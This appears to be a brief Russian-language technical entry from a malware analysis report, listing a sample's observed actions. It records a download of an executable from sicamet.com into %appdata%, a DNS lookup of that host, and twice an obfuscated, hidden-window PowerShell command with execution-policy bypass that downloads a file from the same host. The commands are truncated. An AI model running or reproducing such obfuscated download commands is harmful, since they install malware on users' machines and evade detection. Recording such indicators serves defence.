Техническая информация
- http://sicamet.com/js/goodgame.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^eRsh^ELL.e^xE -Ex^Ec^U^t^Io^NpO^L^I^Cy^ B^Y^pASS^ -noprofilE^ ^-^w^IN^D^ows^tYLE^ H^IDdEN (^n^eW^-O^B^JE^c^t S^YsTeM.net.w^EbCliENT^).d^O^wN^Lo^ad^FIL^E^('http://sicamet.com/js/...
- DNS ASK si##met.com
- '<SYSTEM32>\cmd.exe' /c "pOW^eRsh^ELL.e^xE -Ex^Ec^U^t^Io^NpO^L^I^Cy^ B^Y^pASS^ -noprofilE^ ^-^w^IN^D^ows^tYLE^ H^IDdEN (^n^eW^-O^B^JE^c^t S^YsTeM.net.w^EbCliENT^).d^O^wN^Lo^ad^FIL^E^('http://sicamet.com/js/... (со скрытым окном)